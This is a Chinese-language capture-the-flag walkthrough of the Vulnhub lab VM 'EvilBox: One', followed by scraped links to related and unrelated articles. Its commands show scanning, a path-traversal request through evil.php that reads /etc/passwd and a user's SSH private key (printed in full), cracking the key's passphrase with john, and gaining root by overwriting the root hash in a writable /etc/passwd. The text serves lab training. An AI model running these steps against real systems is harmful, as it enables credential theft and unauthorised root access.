Vulnhub靶场--EVILBOX: ONE
环境配置
靶机连接
攻击者主机IP:192.168.47.130
目标主机IP:192.168.47.131
信息搜集
扫描目标主机,发现目标主机开放了22、80端口
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 192.168.47.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-08 07:46 EST
Nmap scan report for 192.168.47.131
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E9:5C:D1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms 192.168.47.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.78 seconds
访问一下web页面发现是Apache默认页面
Web漏洞挖掘
使用gobuster爆破目录
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.47.131
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,php.bak,txt.bak,git.bak,git,zip,zip.bak,txt,html,js,html.bak,json
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/.html.bak (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 12]
/secret (Status: 301) [Size: 317] [--> http://192.168.47.131/secret/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.html.bak (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
访问/robots.txt
,没有什么内容
访问/secret
,发现是一个空白页面
因为/secret
是一个目录,并不是一个页面,所以考虑接着爆破http://192.168.47.131/secret/
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131/secret/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.47.131/secret/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip.bak,php,txt.bak,git,git.bak,html.bak,json,zip,txt,html,js,php.bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 4]
/.html.bak (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/evil.php (Status: 200) [Size: 0]
/.html.bak (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
发现该路径下存在/evil.php
,访问该页面,发现该页面还是一个空白页面。
那么只可能是这个php页面需要传递参数,但是目前不知道有哪些参数,所以尝试爆破这个参数。爆破时考虑会不会是文件包含漏洞或者命令执行,而通过上面的爆破可以知道,有一个页面是index.html
,所以尝试读取这个页面,看看是不是文件包含漏洞。
这里使用fuff工具进行模糊枚举。
┌──(kali㉿kali)-[~]
└─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.47.131/secret/evil.php?FUZZ=../index.html -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.47.131/secret/evil.php?FUZZ=../index.html
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________
command [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 8ms]
:: Progress: [6453/6453] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
经过爆破,发现存在一个可以读取文件的参数command
,既然可以读取文件,那么尝试读取/etc/passwd
文件,通过读取这个文件,发现除了root
用户还有mowree
用户。
通过一开始的扫描可以知道目标主机开放了SSH服务,所以,尝试读取/home/mowree/.ssh/id_rsa
,看看是否存在私钥。
读取之后发现该私钥是存在的,那么我们就可以使用这个私钥的用户登录目标主机。
┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
mowree@192.168.47.131's password:
使用id_rsa
登录目标主机的时候发现该私钥是加密的,那么尝试使用john
爆破私钥密码。
首先使用john
的脚本把私钥转换成john
可识别的ssh
密钥文件:
┌──(kali㉿kali)-[~/tools]
└─$ curl http://192.168.47.131/secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa > id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1743 100 1743 0 0 373k 0 --:--:-- --:--:-- --:--:-- 425k
┌──(kali㉿kali)-[~/tools]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
┌──(kali㉿kali)-[~/tools]
└─$ /usr/share/john/ssh2john.py id_rsa > hash
接着,使用john
爆破得到密码为unicorn
:
┌──(kali㉿kali)-[~/tools]
└─$ john hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2023-11-08 09:13) 100.0g/s 124800p/s 124800c/s 124800C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
使用私钥密码登录目标主机
┌──(kali㉿kali)-[~/tools]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$
提权
收集目标主机的信息
mowree@EvilBoxOne:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e9:5c:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.47.131/24 brd 192.168.47.255 scope global dynamic ens33
valid_lft 1225sec preferred_lft 1225sec
inet6 fe80::20c:29ff:fee9:5cd1/64 scope link
valid_lft forever preferred_lft forever
mowree@EvilBoxOne:~$ uname -a
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ pwd
/home/mowree
查找是否存在可以用于suid提权的文件,发现也没有
mowree@EvilBoxOne:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su
直接使用linpeas脚本检查,通过该脚本的检查,发现对/etc/passwd
具有可写权限
既然文件可读写,那么直接自定义一个密码,覆盖root
用户的密码,首先自定义密码为12345678
mowree@EvilBoxOne:~$ openssl passwd -1
Password:
Verifying - Password:
$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1
切换root
用户,提权成功。
mowree@EvilBoxOne:~$ cat /etc/passwd | head -n 5
root:$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree#
Vulnhub靶场--EVILBOX: ONE的更多相关文章
- vulnhub靶场之EVILBOX: ONE
准备: 攻击机:虚拟机kali.本机win10. 靶机:EVILBOX: ONE,下载地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- VulnHub靶场学习_HA: ARMOUR
HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...
- VulnHub靶场学习_HA: InfinityStones
HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...
- VulnHub靶场学习_HA: Avengers Arsenal
HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...
- VulnHub靶场学习_HA: Chanakya
HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...
- VulnHub靶场学习_HA: Pandavas
HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...
- VulnHub靶场学习_HA: Natraj
HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...
- VulnHub靶场学习_HA: Chakravyuh
HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...
- VulnHub靶场学习_HA:Forensics
HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ...
随机推荐
- Linux中单引号和双引号的区别
区别:单引号属于强引用,它会忽略所有被引起来的字符的特殊处理,被引用起来的字符会被原封不动的使用:而双引号属于弱引用,它会对一些被引起来的字符进行特殊处理.简单来说,单引号直接输出内部字符串,不解析特 ...
- JS leetcode 存在重复元素 II 题解分析,记一次震惊的负向优化
壹 ❀ 引 整理下今天做的算法题,题目难度不高,但在优化角度也是费了一些功夫.题目来自219. 存在重复元素 II,问题描述如下: 给定一个整数数组和一个整数 k,判断数组中是否存在两个不同的索引 i ...
- NC204871 求和
题目链接 题目 题目描述 已知有 \(n\) 个节点,有 \(n-1\) 条边,形成一个树的结构. 给定一个根节点 \(k\) ,每个节点都有一个权值,节点i的权值为 \(v_i\) . 给 \(m\ ...
- [WPF] MediaElement播放HDR视频泛黄、颜色显示不正确应该如何解决?
当我们在使用MediaElement控件播放HDR视频时会遇到颜色发灰.泛黄的情况,难道是因为控件做的有问题? 其实并不是程序问题,只是我们普通的应用程序工作在8bit色深的环境中,而HDR色深为10 ...
- Laravel入坑指南(10)——事件Event
不知不觉,我们已经来到了第10小节.这一小节,我们一起讨论关于"事件"这个话题.众所周知,从二进制到汇编,再到高等级语言,这一路发展下来,代码都是顺序执行的,那么事件是什么?这个事 ...
- springboot+vue+elementui实现文件上传下载删除DEMO
说明 前面搜索了几个关于springboot+vue+elementui上传下载的文章,感觉写的都不尽如人意.要么是功能不完善,不好用.再者就是源码提供的实在差劲,都不完整.一气之下,自己搞了一个实用 ...
- ORA-31655,ORA-39154 Objects from foreign schemas have been removed from import
问题说明 在执行数据泵导入时提示错误: 问题原因 执行导入的用户缺少导入数据库的权限. 解决问题 给用户赋予导入数据库权限: grant imp_full_database to 用户; 然后重新执行 ...
- spring boot+layui分页实战
项目用了layui,做了个简单的图书搜索页,分享出来. 喜欢的朋友给点个赞!!! 实现效果 开发步骤 1.前端页面和JS <!DOCTYPE html> <html xmlns=&q ...
- 【Android逆向】脱壳项目 frida-dexdump 原理分析
1. 项目代码地址 https://github.com/hluwa/frida-dexdump 2. 核心逻辑为 def dump(self): logger.info("[+] Sear ...
- EasyExcel使用及自定义设置单元格样式
EasyExcel使用及自定义设置单元格样式 https://www.cnblogs.com/Hizy/p/11825886.html easyexcel 自动设置列宽 https://www.man ...